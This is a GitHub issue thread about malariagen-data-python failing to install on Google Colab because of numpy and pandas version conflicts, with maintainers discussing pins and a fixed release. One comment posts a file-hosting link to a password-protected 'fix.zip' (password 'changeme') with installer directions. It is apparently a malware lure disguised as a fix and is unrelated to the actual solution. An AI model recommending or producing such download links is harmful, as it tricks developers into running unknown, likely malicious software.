### ISSUE TITLE
Install failing on Colab (package incompatibility)

### ISSUE THREAD

**Issue by ahernank** [malariagen/malariagen-data-python#586]
When installing via pip in Google Colab, there seem to be some issues around solving dependencies using the pyproject.toml; the solver seems to get stuck trying to install versions of numpy (2.0.2) & pandas (1.5.3) that are incompatible with current versions of (external) packages on Colab. These issues seem to relate mostly (but not exclusively) to the packages upgrades on the latest [Colab release](https://colab.research.google.com/notebooks/relnotes.ipynb).

This should be sorted by pinning compatible versions on our requirements but I don't fully understand how these incompatibilities are only showing now (and why the solver is trying to use numpy==2.0.2 to resolve them). Wondered if it could be due to the pip/setuptools upgrades on Colab, but this didn't seem to be the case. It seems to be due to numpy itself, as regular np installs with the latest versions are failing too.

<img width="1339" alt="Screenshot 2024-08-28 at 06 53 49" src="https://github.com/user-attachments/assets/ba53f416-6735-4657-a4ab-df8a5e9d9c96">

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahernank** [comment]
This issue can also be seen on local installations. So far, I have only managed to make it work using Python3.9 and downgrading numpy (i.e., python3.9 -m pip install malariagen_data 'numpy==1.26.4'). 

Other versions are having issues around cython compiling with this solution.

**Comment by JaneNjeri** [comment]
Hi Anastasia, I also got a conflict with the version of pandas on my end with local installation.
Error: "cudf-cu12 24.4.1 requires pandas<2.2.2dev0,>=2.0, but you have pandas 1.5.3 which is incompatible"

Would it be an option to have exact versions in the pyproject.toml?

**Comment by alimanfoo** [comment]
@ahernank has just released v12.0.1 which resolves this issue. I just checked on colab and confirm install is working fine.

Suggest we close here and raise a follow-up issue to add support for numpy version 2.x so we are ready for it when colab decides to upgrade.

Also suggest we drop support for Python 3.9 to align with numpy etc.
